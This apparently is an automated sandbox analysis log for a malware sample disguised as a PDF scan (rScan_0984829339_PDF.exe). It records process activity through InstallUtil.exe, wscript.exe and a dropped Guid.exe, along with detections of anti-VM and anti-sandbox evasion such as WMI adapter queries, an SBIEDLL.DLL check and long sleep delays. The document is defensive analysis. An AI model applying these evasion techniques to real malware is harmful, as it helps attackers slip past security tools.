                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Yara detected AntiVM3
                      Source: Yara matchFile source: Process Memory Space: rScan_0984829339_PDF.exe PID: 6272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Guid.exe PID: 5588, type: MEMORYSTR
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                      Source: rScan_0984829339_PDF.exe, 00000000.00000002.2262633916.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, Guid.exe, 00000005.00000002.2451764397.0000000003018000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeMemory allocated: 12E0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeMemory allocated: 2C30000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1470000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4F70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeMemory allocated: 1550000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeMemory allocated: 2F70000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeMemory allocated: 2EC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: FE0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2870000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 4870000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeWindow / User API: threadDelayed 2316Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exeWindow / User API: threadDelayed 7486Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeWindow / User API: threadDelayed 1680Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exeWindow / User API: threadDelayed 4512Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep count: 33 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2644Thread sleep count: 2316 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -99839s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2644Thread sleep count: 7486 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -99719s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -99609s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -99500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -99391s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -99281s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -99172s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -99063s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -98930s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -98813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -98703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -98586s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -98465s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -98355s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -98203s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -98077s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -97957s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -97750s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -97632s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -97492s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -97375s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -97266s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -97156s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -97047s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -96938s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -96813s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -96703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -96594s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -96469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -96359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -96250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -96140s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -96031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -95922s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -95812s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -95703s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -95594s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -95469s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -95359s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -95250s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -95129s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -95013s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -94887s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -94700s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -94500s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -94391s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -94266s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -94141s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -94031s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\rScan_0984829339_PDF.exe TID: 2084Thread sleep time: -93922s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -18446744073709540s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 6368Thread sleep time: -100000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Guid.exe TID: 5256Thread sleep count: 1680 > 30Jump to behavior
